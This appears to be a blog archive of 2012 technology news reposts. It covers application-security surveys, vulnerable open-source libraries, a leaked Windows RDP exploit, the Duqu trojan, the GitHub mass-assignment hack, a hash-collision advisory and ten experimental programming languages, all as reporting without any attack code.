Despite the data breaches resulting from hacked or compromised applications and the lack of compliance with regulations, 38 percent of security practitioners and 39 percent of developers say less than 10 percent of the IT security budget is dedicated to application security.

“We set out to measure the tolerance to risk across the established phases of application security, and define what works and what hasn’t worked, how industries are organizing themselves and what gaps exist,” says Dr. Larry Ponemon, CEO of the Ponemon Institute, the research firm that conducted the study on the behalf of security firm Security Innovation. “We accomplished that, but what we also found was a drastic divide between the IT security and development organizations that is caused by a major skills shortage and a fundamental misunderstanding of how an application security process should be developed. This lack of alignment seems to hurt their business based on not prioritizing secure software, but also not understanding what to do about it.”

The study found that security practitioners and developers were far apart in their perception of the issue. While one might expect that security practitioners held the more cynical views with regard to application security, in fact the opposite was true. Dr. Ponemon says 71 percent of developers say application security was not adequately emphasized during the application development lifecycle, compared with 49 percent of security practitioners who felt the same way. Additionally, 46 percent of developers say their organization had no process for ensuring security is built into new applications, while only 21 percent of security practitioners believed that to be the case.

Developers and security practitioners are also divided on the issue of remediating vulnerable code. Nearly half (47 percent) of developers say their organization have no formal mandate to remediate vulnerable code, while 29 percent of security practitioners say the same.

“What emerged in this study was that companies don’t seem to be looking at the root causes of data breaches, and they aren’t moving very fast to bridge the existing gaps to fix the myriad of problems,” says Ed Adams, CEO of Security Innovation. “The threat landscape has grown substantially in scope, most notably as our survey respondents stated that Web 2.0 and mobile attacks are the targets of the next wave of threats beyond just web applications.”

The survey also found that nearly half of developers say there is no collaboration between their development organization and the security organization when it comes to application security. That’s a stark contrast from the 19 percent of security practitioners that say there is no collaboration.

Lack of Collaboration in Application Security

“We basically found that developers were much more likely to think there was a lack of collaboration,” Dr. Ponemon says. “The security folks, on the whole, thought the collaboration was OK. I think that one of the biggest problems is that the security folks think they’re getting the word out on collaborating or helping, but they’re not doing so effectively.”

In other words, Dr. Ponemon says, the security organization writes its security policy and gives it to developers, but the developers, by and large, don’t understand how to implement that policy. The security organizations think they’ve done their job, but they haven’t managed to make their policy contextual for developers.

“We find that process has no bearing whatsoever on the ability of an organization to write secure code,” Dr. Ponemon says. “It doesn’t take any longer to write a line of secure code than it does to write a line of insecure code. You just have to know which one to write.”

Education Is Key to Application Security

But knowing which line of code to write seems to be a large part of the problem. The study found that only 22 percent of security practitioners and 11 percent of developers say their organization has a fully deployed application security training program. Fully 36 percent of security practitioners and 37 percent of developers say their organization had no application security training program and no plans to deploy one.

Adams believes providing that education will go a long way toward helping organizations secure their applications and minimize the risk.

“This is more of an education problem than anything else,” Adams says. “In the late 90s, everybody was putting their applications on the web. But they kept on crashing. It was really a performance problem: The developers didn’t know how to code for performance. Amazingly, that’s what’s happening in the world today. Organizations are buying application security tools before they get application security training. You have to get trained on the technique first.”


Open source code libraries seen as rife with vulnerabilities

Tuesday, March 27th, 2012

Google Web Toolkit, Apache Xerces among most downloaded vulnerable libraries, study says

A study of how 31 popular open-source code libraries were downloaded over the past 12 months found that more than a third of the 1,261 versions of these libraries had a known vulnerability and about a quarter of the downloads were tainted.

The study was undertaken by Aspect Security, which evaluates software for vulnerabilities, with Sonatype, a firm that provides a Central Repository housing more than 300,000 libraries for downloading open-source components and gets 4 billion requests per year.

“Increasingly over the past few years, applications are being constructed out of libraries,” says Jeff Williams, CEO of Aspect Security, referring to “The Unfortunate Reality of Insecure Libraries” study. Open-source communities have done little to provide a clear way to spotlight code found to have vulnerabilities or identify how to remedy it when a fix is even made available, he says.

“There’s no notification infrastructure at all,” says Williams. “We want to shed light on this problem.”

He adds that Aspect and Sonatype are mulling how it might be possible to improve the situation overall.

According to the study, researchers at Aspect analyzed 113 million software downloads made over 12 months from the Central Repository of 31 popular Java frameworks and security libraries (Aspect says one basis for the selection of libraries were those being used by its customers). Researchers found:

– 19.8 million (26%) of the library downloads have known vulnerabilities.

– The most downloaded vulnerable libraries were Google Web Toolkit (GWT); Apache Xerces; Spring MVC; and Struts 1.x. (The other libraries examined were: Apache CXF; Hibernate; Java Servlet; Log4j; Apache Velocity; Spring Security; Apache Axis; BouncyCastle; Apache Commons; Tiles; Struts2; Wicket; Java Server Pages; Lift; Hibernate Validator; Java Server Faces; Tapestry; Apache Santuario; JAX-WS; Grails; Jasypt; Apache Shiro; Stripes; AntiSamy; ESAPI; HDIV and JBoss Seam.)

Security libraries are slightly more likely to have a known vulnerability than frameworks, the study says. “Today’s applications commonly use 30 or more libraries, which can compromise up to 80% of the code in an application,” according to the study.

The types of vulnerabilities found in open source code libraries vary widely.

“While some vulnerabilities allow the complete takeover of the host using them, others might result in data loss or corruption, and still others might provide a bit of useful information to attackers,” the study says. “In most cases, the impact of a vulnerability depends greatly on how the library is used by the application.”

The study noted some known well-publicized vulnerabilities.

– Spring, the popular application development framework for Java, was downloaded more than 18 million times by over 43,000 organizations in the last year. However, a discovery last year showed a new class of vulnerabilities in Spring’s use of Expression Language that could be exploited through HTTP parameter submissions that would allow attackers to get sensitive system data, application and user cookies.

– in 2010 Google’s research team discovered a weakness in Struts2 that allowed attackers to execute arbitrary code on any Struts2 Web application.

– In Apache CXF, a framework for Web Services, which was downloaded 4.2 million times by more than 16,000 organizations in the last 12 months, two major vulnerabilities were discovered since 2010 (CVE-2010-2076 and CVE 2012-0803) that allowed attackers to trick any service using CXF to download arbitrary system files and bypass authentication.

Discovery of vulnerabilities are made by researchers, who disclose them as they choose, with some coordinated and “others simply write blog posts or emails in mailing lists,” the study notes. “Currently, developers have no way to know that the library versions they are using have known vulnerabilities. They would have to monitor dozens of mailing lists, blogs, and forums to stay abreast of information. Further, development teams are unlikely to find their own vulnerabilities, as it requires extensive security experience and automated tools are largely ineffective at analyzing libraries.”

Although some open source groups, such as OpenBSD, are “quite good” in how they manage vulnerability disclosures, says Williams, the vast majority handle these kinds of security issues in haphazard fashion and with uncertain disclosure methods. Organizations should strengthen their security processes and OpenBSD can be considered an encouraging model in that respect, the study says.

Williams adds that use of open source libraries also raises the question of “dependency management.” This is the security process that developers would use to identify what libraries their project really directly depends on. Often, developers end up using code that goes beyond the functionality that’s really needed, using libraries that may also be dependent on other libraries. This sweeps in a lot of out-of-date code that brings risk and no added value, but swells the application in size. “Find out what libraries you’re using and which are out of date,” says Williams. “We suggest minimizing the use of libraries.”

The report points out, “While organizations typically have strong patch management processes for software products, open source libraries are typically not part of these processes. In virtually all development organizations, updates to libraries are handled on an ad hoc basis, by development teams.”


Suspicions aroused as exploit for critical Windows bug is leaked

Sunday, March 18th, 2012

Attack code privately submitted to Microsoft to demonstrate the severity of a critical Windows vulnerability is circulating on the ‘Net, prompting the researcher who discovered it to say it was leaked by the software maker or one of its trusted partners.

The precompiled executable surfaced on Chinese-language web links such as this one on Thursday, two days after Microsoft released a patch for the hole, which affects all supported versions of the Windows operating system. The company warned users to install the fix as soon as possible because the vulnerability allows attackers to hit high-value targets with self-replicating exploits that remotely install malicious software. Microsoft security personnel have predicted exploit code will be independently developed in the next month.

Luigi Auriemma, the Italian security researcher who discovered the vulnerability and submitted proof-of-concept code to Microsoft and one of its partners in November, wrote in an email that he’s “100% sure” the rdpclient.exe binary was taken from the exploit he wrote. In a later blog post, he said evidence his code was copied included an internal tracking number the Microsoft Security Response Center assigned to the vulnerability. He also cited other striking similarities in the packet that triggers the vulnerability.

“So yes, the pre-built packet stored in ‘rdpclient.exe’ IS mine,” he wrote. “No doubts.”

He went on to speculate that the code was leaked by someone from Microsoft or one of its trusted partners. He specifically named ZDI, or the Zero Day Initiative, which is a program sponsored by HP-owned Tipping Point, a maker of intrusion prevention systems that pays researchers cash for technical details about critical software vulnerabilities. He also speculated the leak could have come from any one of the 30 or so partners who participate in the Microsoft Active Protections Program. The program gives antivirus and IPS makers technical details of Microsoft vulnerabilities in advance so they can release signatures that prevent them from being exploited.

Update: Aaron Portnoy, ZDI’s Manager of Security Research told Ars he’s sure the leak didn’t come from anyone with his company.

“I’ve actually gotten confirmation from Microsoft that they’re are also confident that the leak wasn’t from us,” he said in an interview. “I can’t comment further on the issue other than [to say] they seem to have some is knowledge as to what happened and they are confident it was not from us.”

He said exploit details have never leaked out of his company, and he added he was unaware of leaks involving other Microsoft partners, either.

Update 2: Yunsun Wee, Director of Microsoft’s Trustworthy Computing division confirmed that the code appeared to be match vulnerability information shared with MAPP partners.

“Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,” Wee wrote in a blog post. The statement made no reference to Portnoy’s comments.

Members of the Metasploit framework, an open-source package that hackers and penetration testers use to exploit known security bugs, have confirmed that rdpclient.exe triggers the vulnerability Microsoft reported Tuesday. It resides in the Remote Desktop Protocol and allows attackers to execute code of their choosing on any machine that has it turned on. HD Moore, CSO of Rapid7 and chief architect of the Metasploit project, told Ars the code caused a machine running Windows Server 2008 R2 to display a blue screen of death, but there were no signs it executed any code.

He said Metasploit personnel have been able to replicate the crash, but are still several weeks away from being able to exploit the bug to execute code.

“It’s a still a huge vector for knocking servers offline right now if you can figure out how to DOS the RDP service,” he said in an interview.

There are unconfirmed claims that code is already circulating in the wild that does far more than cause machines to crash. This screen shot, for example, purports to show a Windows machine receiving a remote payload after the vulnerability is exploited. Security consultants have said there’s no proof such attacks are real.

“On the other hand, if they’ve had this since November internally, it’s not impossible that someone would have had time to actually develop what that screen shot is showing,” Alex Ionescu, who is chief architect of security firm CrowdStrike, told Ars.


Duqu Trojan contains unknown programming language

Monday, March 12th, 2012

The Duqu torjan has researchers puzzled as it contains a programming language they’ve never seen before

In June 2010, the world became aware of Stuxnet, largely considered to be the most advanced and dangerous piece of malware ever created. But before you run to check that your antivirus software is up to date, note that Stuxnet, largely believed to be state-created, was created with one singular purpose in mind – to cripple Iran’s ability to develop nuclear weapons.

When security researches began studying Stuxnet more closely, they were astonished at its level of sophistication. Stuxnet’s ultimate aim, researches found, was to target specialized Siemens industrial software and equipment employed in Iran’s Nuclear research facilities. The original Stuxnet virus was able to deftly inject code into the Programmable Logic Controllers (PLC) of the aforementioned Siemens industrial control systems.

The end result, according to foreign reports, is that Stuxnet was able to infiltrate an Iranian uranium enrichment facility and subsequently destroy over 1,000 centrifuges, albeit in a subtle manner as to avoid detection from Iranian nuclear scientists.

In the wake of Stuxnet, researchers weren’t shy about proclaiming that new era of sophisticated malware was upon us.

This past September, a new variant of Stuxnet was discovered. It’s called Duqu and security experts believe it was developed in conjunction with Stuxnet by the same development team. After studying the software, security firm Symantec said that the Duqu virus was almost identical to Stuxnet, yet with a “completely different purpose.”

The reported goal of the Duqu virus wasn’t to sabotage but rather to acquire information.

A research report from Symantec this past October explained,

Duqu is essentially the precursor to a future Stuxnet-like attack. The threat was written by the same authors (or those that have access to the Stuxnet source code) and appears to have been created since the last Stuxnet file was recovered. Duqu’s purpose is to gather intelligence data and assets from entities, such as industrial control system manufacturers, in order to more easily conduct a future attack against another third party. The attackers are looking for information such as design documents that could help them mount a future attack on an industrial control facility.

And just when you thought the whole Stuxnet/Duqu trojan saga couldn’t get any crazier, a security firm who has been analyzing Duqu writes that it employs a programming language that they’ve never seen before.

Security researchers at Kapersky Lab found the “payload DLL” of Duqu is comprised of code from an unrecognizable programming language. While many parts of the Trojan are written in C++, other portions contain syntax that security researchers can’t pin back to a recognizable programming language.

After analyzing the code, researchers at Kapersky were able to conclude the following:

  • The Duqu Framework appears to have been written in an unknown programming language.
  • Unlike the rest of the Duqu body, it’s not C++ and it’s not compiled with Microsoft’s Visual C++ 2008.
  • The highly event driven architecture points to code which was designed to be used in pretty much any kind of conditions, including asynchronous commutations.
  • Given the size of the Duqu project, it is possible that another team was responsible for the framework than the team which created the drivers and wrote the system infection and exploits.
  • The mysterious programming language is definitively NOT C++, Objective C, Java, Python, Ada, Lua and many other languages we have checked.
  • Compared to Stuxnet (entirely written in MSVC++), this is one of the defining particularities of the Duqu framework.

Consequently, Kapersky decided to reach out to the programming community to help them figure out which programming language the Duqu Framework employs. As of Sunday evening, nothing conclusive has been found, but a comment on Kapersky’s blog post might prove useful.

The code your referring to .. the unknown c++ looks like the older IBM compilers found in OS400 SYS38 and the oldest sys36.The C++ code was used to write the tcp/ip stack for the operating system and all of the communications. The protocols used were the following x.21(async) all modes, Sync SDLC, x.25 Vbiss5 10 15 and 25. CICS. RSR232. This was a very small and powerful communications framework. The IBM system 36 had only 300MB hard drive and one megabyte of memory,the operating system came on diskettes.This would be very useful in this virus. It can track and monitor all types of communications. It can connect to everything and anything.

While many other suggestions via the comment section were  dismissed by Kapersky lab expert Igor Soumenkov, the one above netted a “Thank you!”

Another tip that Soumenkov seemed excited about identifies the unknown language as Simple Object Orientation (for C), but not without some reservations.

SOO may be the correct answer! But there are still two things to figure out:
1) When was SOO C created? I see Oct 2010 in git – that’s too late, Duqu was already out there.
2) If SOO is the toolkit, then event driven model was created by the authors of Duqu. Given the size of framework-based code, they should have spent 1+ year making all things work correctly.

It turns out that almost the same code can be produced by the MSVC compiler for a “hand-made” C class. This means that a custom OO C framework is the most probable answer to our question.
We kept this (OO C) version as a “worst-case” explanation – because that would mean that the amout of time and effort invested in development of the Framework is enormous compared to other languages/toolkits.

Note that work on Duqu, according to researchers, began sometime in 2007. And as for the enormous amount of work Soumenkov refers to, remember that most researchers believe Stuxnet and its bretheren were created by state actors. Many believe Israel and the United States may have worked together on the project to stymie Iran’s nuclear weapons plans. Others believe Stuxnet may be the handiwork of China.


Hacker commandeers GitHub to prove Rails vulnerability

Tuesday, March 6th, 2012

A Russian hacker dramatically demonstrated one of the most common security weaknesses in the Ruby on Rails web application language. By doing so, he took full control of the databases GitHub uses to distribute Linux and thousands of other open-source software packages.

Egor Homakov exploited what’s known as a mass assignment vulnerability in GitHub to gain administrator access to the Ruby on Rails repository hosted on the popular website. The weekend hack allowed him to post an entry in the framework’s bug tracker dated 1,001 years into the future. It also allowed him to gain write privileges to the code repository. He carried out the attack by replacing a cryptographic key of a known developer with one he created. While the hack was innocuous, it sparked alarm among open-source advocates because it could have been used to plant malicious code in repositories millions of people use to download trusted software.

Homakov launched the attack two days after he posted a vulnerability report to the Rails bug list warning mass assignments in Rails made the websites relying on the developer language susceptible to compromise. A variety of developers replied with posts saying the vulnerability is already well known and responsibility for preventing exploits rests with those who use the language. Homakov responded by saying even developers for large sites for GitHub, Poster, Speakerdeck, and Scribd were failing to adequately protect against the vulnerability.

In the following hours, participants in the online discussion continued to debate the issue. The mass assignment vulnerability is to Rails what SQL injection weaknesses are to other web applications. It’s a bug that’s so common many users have grown impatient with warnings about them. Maintainers of Rails have largely argued individual developers should single out and “blacklist” attributes that are too sensitive to security to be externally modified. Others such as Homakov have said Rails maintainers should turn on whitelist technology by default. Currently, applications must explicitly enable such protections.

A couple days into the debate, Homakov responded by exploiting mass assignment bugs in GitHub to take control of the site. Less than an hour after discovering the attack, GitHub administrators deployed a fix for the underlying vulnerability and initiated an investigation to see if other parts of the site suffered from similar weaknesses. The site also temporarily suspended Homakov, later reinstating him.

“Now that we’ve had a chance to review his activity, and have determined that no malicious intent was present, @homakov’s account has been reinstated,” a blog post published on Monday said. It went on to encourage developers to practice “responsible disclosure.”


Multiple Programming Language Implementations Vulnerable to Hash Table Collision Attacks

Tuesday, January 3rd, 2012

US-CERT is aware of reports stating that multiple programming language implementations, including web platforms, are vulnerable to hash table collision attacks. This vulnerability could be used by an attacker to launch a denial-of-service attack against websites using affected products.

The Ruby Security Team has updated Ruby 1.8.7. The Ruby 1.9 series is not affected by this attack. Additional information can be found in the ruby 1.8.7 patchlevel 357 release notes.

Microsoft has released an update for the .NET Framework to address this vulnerability and three others. Additional information can be found in Microsoft Security Bulletin MS11-100 and Microsoft Security Advisory 2659883.

More information regarding this vulnerability can be found in US-CERT Vulnerability Note VU#903934 and n.runs Security Advisory n.runs-SA-2011.004.

US-CERT will provide additional information as it becomes available.

Source:  US-CERT

10 programming languages that could shake up IT

Tuesday, January 3rd, 2012

These cutting-edge programming languages provide unique insights on the future of software development

Do we really need another programming language? There is certainly no shortage of choices already. Between imperative languages, functional languages, object-oriented languages, dynamic languages, compiled languages, interpreted languages, and scripting languages, no developer could ever learn all of the options available today.

And yet, new languages emerge with surprising frequency. Some are designed by students or hobbyists as personal projects. Others are the products of large IT vendors. Even small and midsize companies are getting in on the action, creating languages to serve the needs of their industries. Why do people keep reinventing the wheel?The answer is that, as powerful and versatile as the current crop of languages may be, no single syntax is ideally suited for every purpose. What’s more, programming itself is constantly evolving. The rise of multicore CPUs, cloud computing, mobility, and distributed architectures have created new challenges for developers. Adding support for the latest features, paradigms, and patterns to existing languages — especially popular ones — can be prohibitively difficult. Sometimes the best answer is to start from scratch.

Here, then, is a look at 10 cutting-edge programming languages, each of which approaches the art of software development from a fresh perspective, tackling a specific problem or a unique shortcoming of today’s more popular languages. Some are mature projects, while others are in the early stages of development. Some are likely to remain obscure, but any one of them could become the breakthrough tool that changes programming for years to come — at least, until the next batch of new languages arrives.

Experimental programming language No. 1: Dart
JavaScript is fine for adding basic interactivity to Web pages, but when your Web applications swell to thousands of lines of code, its weaknesses quickly become apparent. That’s why Google created Dart, a language it hopes will become the new vernacular of Web programming.

Like JavaScript, Dart uses C-like syntax and keywords. One significant difference, however, is that while JavaScript is a prototype-based language, objects in Dart are defined using classes and interfaces, as in C++ or Java. Dart also allows programmers to optionally declare variables with static types. The idea is that Dart should be as familiar, dynamic, and fluid as JavaScript, yet allow developers to write code that is faster, easier to maintain, and less susceptible to subtle bugs.

You can’t do much with Dart today. It’s designed to run on either the client or the server (a la Node.js), but the only way to run client-side Dart code so far is to cross-compile it to JavaScript. Even then it doesn’t work with every browser. But because Dart is released under a BSD-style open source license, any vendor that buys Google’s vision is free to build the language into its products. Google only has an entire industry to convince.

Experimental programming language No. 2: Ceylon
Gavin King denies that Ceylon, the language he’s developing at Red Hat, is meant to be a “Java killer.” King is best known as the creator of the Hibernate object-relational mapping framework for Java. He likes Java, but he thinks it leaves lots of room for improvement.

Among King’s gripes are Java’s verbose syntax, its lack of first-class and higher-order functions, and its poor support for meta-programming. In particular, he’s frustrated with the absence of a declarative syntax for structured data definition, which he says leaves Java “joined at the hip to XML.” Ceylon aims to solve all these problems.

King and his team don’t plan to reinvent the wheel completely. There will be no Ceylon virtual machine; the Ceylon compiler will output Java bytecode that runs on the JVM. But Ceylon will be more than just a compiler, too. A big goal of the project is to create a new Ceylon SDK to replace the Java SDK, which King says is bloated and clumsy, and it’s never been “properly modernized.”

That’s a tall order, and Red Hat has released no Ceylon tools yet. King says to expect a compiler this year. Just don’t expect software written in “100 percent pure Ceylon” any time soon.

Experimental programming language No. 3: Go
Interpreters, virtual machines, and managed code are all the rage these days. Do we really need another old-fashioned language that compiles to native binaries? A team of Google engineers — led by Robert Griesemer and Bell Labs legends Ken Thompson and Rob Pike — says yes.

Go is a general-purpose programming language suitable for everything from application development to systems programing. In that sense, it’s more like C or C++ than Java or C#. But like the latter languages, Go includes modern features such as garbage collection, runtime reflection, and support for concurrency.

Equally important, Go is meant to be easy to program in. Its basic syntax is C-like, but it eliminates redundant syntax and boilerplate while streamlining operations such as object definition. The Go team’s goal was to create a language that’s as pleasant to code in as a dynamic scripting language yet offers the power of a compiled language.

Go is still a work in progress, and the language specification may change. That said, you can start working with it today. Google has made tools and compilers available along with copious documentation; for example, the Effective Go tutorial is a good place to learn how Go differs from earlier languages.

Experimental programming language No. 4: F#
Functional programming has long been popular with computer scientists and academia, but pure functional languages like Lisp and Haskell are often considered unworkable for real-world software development. One common complaint is that functional-style code can be difficult to integrate with code and libraries written in imperative languages like C++ and Java.

Enter F# (pronounced “F-sharp”), a Microsoft language designed to be both functional and practical. Because F# is a first-class language on the .Net Common Language Runtime (CLR), it can access all of the same libraries and features as other CLR languages, such as C# and Visual Basic.

F# code resembles OCaml somewhat, but it adds interesting syntax of its own. For example, numeric data types in F# can be assigned units of measure to aid scientific computation. F# also offers constructs to aid asynchronous I/O, CPU parallelization, and off-loading processing to the GPU.

After a long gestation period at Microsoft Research, F# now ships with Visual Studio 2010. Better still, in an unusual move, Microsoft has made the F# compiler and core library available under the Apache open source license; you can start working with it for free and even use it on Mac and Linux systems (via the Mono runtime).

Experimental programming language No. 5: Opa
Web development is too complicated. Even the simplest Web app requires countless lines of code in multiple languages: HTML and JavaScript on the client, Java or PHP on the server, SQL in the database, and so on.

Opa doesn’t replace any of these languages individually. Rather, it seeks to eliminate them all at once, by proposing an entirely new paradigm for Web programming. In an Opa application, the client-side UI, server-side logic, and database I/O are all implemented in a single language, Opa.

Opa accomplishes this through a combination of client- and server-side frameworks. The Opa compiler decides whether a given routine should run on the client, server, or both, and it outputs code accordingly. For client-side routines, it translates Opa into the appropriate JavaScript code, including AJAX calls.

Naturally, a system this integrated requires some back-end magic. Opa’s runtime environment bundles its own Web server and database management system, which can’t be replaced with stand-alone alternatives. That may be a small price to pay, however, for the ability to prototype sophisticated, data-driven Web applications in just a few dozen lines of code. Opa is open source and available now for 64-bit Linux and Mac OS X platforms, with further ports in the works.

Experimental programming language No. 6: Fantom
Should you develop your applications for Java or .Net? If you code in Fantom, you can take your pick and even switch platforms midstream. That’s because Fantom is designed from the ground up for cross-platform portability. The Fantom project includes not just a compiler that can output bytecode for either the JVM or the .Net CLI, but also a set of APIs that abstract away the Java and .Net APIs, creating an additional portability layer.

There are plans to extend Fantom’s portability even further. A Fantom-to-JavaScript compiler is already available, and future targets might include the LLVM compiler project, the Parrot VM, and Objective-C for iOS.

But portability is not Fantom’s sole raison d’être. While it remains inherently C-like, it is also meant to improve on the languages that inspired it. It tries to strike a middle ground in some of the more contentious syntax debates, such as strong versus dynamic typing, or interfaces versus classes. It adds easy syntax for declaring data structures and serializing objects. And it includes support for functional programming and concurrency built into the language.

Fantom is open source under the Academic Free License 3.0 and is available for Windows and Unix-like platforms (including Mac OS X).

Experimental programming language No. 7: Zimbu
Most programming languages borrow features and syntax from an earlier language. Zimbu takes bits and pieces from almost all of them. The brainchild of Bram Moolenaar, creator of the Vim text editor, Zimbu aims to be a fast, concise, portable, and easy-to-read language that can be used to code anything from a GUI application to an OS kernel.

Owing to its mongrel nature, Zimbu’s syntax is unique and idiosyncratic, yet feature-rich. It uses C-like expressions and operators, but its own keywords, data types, and block structures. It supports memory management, threads, and pipes.

Portability is a key concern. Although Zimbu is a compiled language, the Zimbu compiler outputs ANSI C code, allowing binaries to be built only on platforms with a native C compiler.

Unfortunately, the Zimbu project is in its infancy. The compiler can build itself and some example programs, but not all valid Zimbu code will compile and run properly. Not all proposed features are implemented yet, and some are implemented in clumsy ways. The language specification is also expected to change over time, adding keywords, types, and syntax as necessary. Thus, documentation is spotty, too. Still, if you would like to experiment, preliminary tools are available under the Apache license.

Experimental programming language No. 8: X10
Parallel processing was once a specialized niche of software development, but with the rise of multicore CPUs and distributed computing, parallelism is going mainstream. Unfortunately, today’s programming languages aren’t keeping pace with the trend. That’s why IBM Research is developing X10, a language designed specifically for modern parallel architectures, with the goal of increasing developer productivity “times 10.”

X10 handles concurrency using the partitioned global address space (PGAS) programming model. Code and data are separated into units and distributed across one or more “places,” making it easy to scale a program from a single-threaded prototype (a single place) to multiple threads running on one or more multicore processors (multiple places) in a high-performance cluster.

X10 code most resembles Java; in fact, the X10 runtime is available as a native executable and as class files for the JVM. The X10 compiler can output C++ or Java source code. Direct interoperability with Java is a future goal of the project.

For now, the language is evolving, yet fairly mature. The compiler and runtime are available for various platforms, including Linux, Mac OS X, and Windows. Additional tools include an Eclipse-based IDE and a debugger, all distributed under the Eclipse Public License.

Experimental programming language No. 9: haXe
Lots of languages can be used to write portable code. C compilers are available for virtually every CPU architecture, and Java bytecode will run wherever there’s a JVM. But haXe (pronounced “hex”) is more than just portable. It’s a multiplatform language that can target diverse operating environments, ranging from native binaries to interpreters and virtual machines.

Developers can write programs in haXe, then compile them into object code, JavaScript, PHP, Flash/ActionScript, or NekoVM bytecode today; additional modules for outputting C# and Java are in the works. Complementing the core language is the haXe standard library, which functions identically on every target, plus target-specific libraries to expose the unique features of each platform.

The haXe syntax is C-like, with a rich feature set. Its chief advantage is that it negates problems inherent in each of the platforms it targets. For example, haXe has strict typing where JavaScript does not; it adds generics and type inference to ActionScript; and it obviates the poorly designed, haphazard syntax of PHP entirely.

Although still under development, haXe is used commercially by its creator, the gaming studio Motion Twin, so it’s no toy. It’s available for Linux, Mac OS X, and Windows under a combination of open source licenses.

Experimental programming language No. 10: Chapel
In the world of high-performance computing, few names loom larger than Cray. It should come as no surprise, then, that Chapel, Cray’s first original programming language, was designed with supercomputing and clustering in mind.

Chapel is part of Cray’s Cascade Program, an ambitious high-performance computing initiative funded in part by the U.S. Defense Advanced Research Project Agency (DARPA). Among its goals are abstracting parallel algorithms from the underlying hardware, improving their performance on architectures, and making parallel programs more portable.

Chapel’s syntax draws from numerous sources. In addition to the usual suspects (C, C++, Java), it borrows concepts from scientific programming languages such as Fortran and Matlab. Its parallel-processing features are influenced by ZPL and High-Performance Fortran, as well as earlier Cray projects.

One of Chapel’s more compelling features is its support for “multi-resolution programming,” which allows developers to prototype applications with highly abstract code and fill in details as the implementation becomes more fully defined.

Work on Chapel is ongoing. At present, it can run on Cray supercomputers and various high-performance clusters, but it’s portable to most Unix-style systems (including Mac OS X and Windows with Cygwin). The source code is available under a BSD-style open source license.